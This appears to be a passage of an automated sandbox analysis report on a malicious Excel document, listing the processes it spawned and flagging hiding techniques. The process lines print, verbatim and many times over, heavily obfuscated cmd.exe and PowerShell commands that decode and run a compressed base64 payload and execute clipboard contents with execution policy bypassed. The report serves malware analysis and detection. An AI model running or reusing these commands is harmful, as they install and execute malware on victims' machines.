Source: unknownProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt
Source: unknownProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'ntJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'ntJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
PowerShell case anomaly foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknownProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
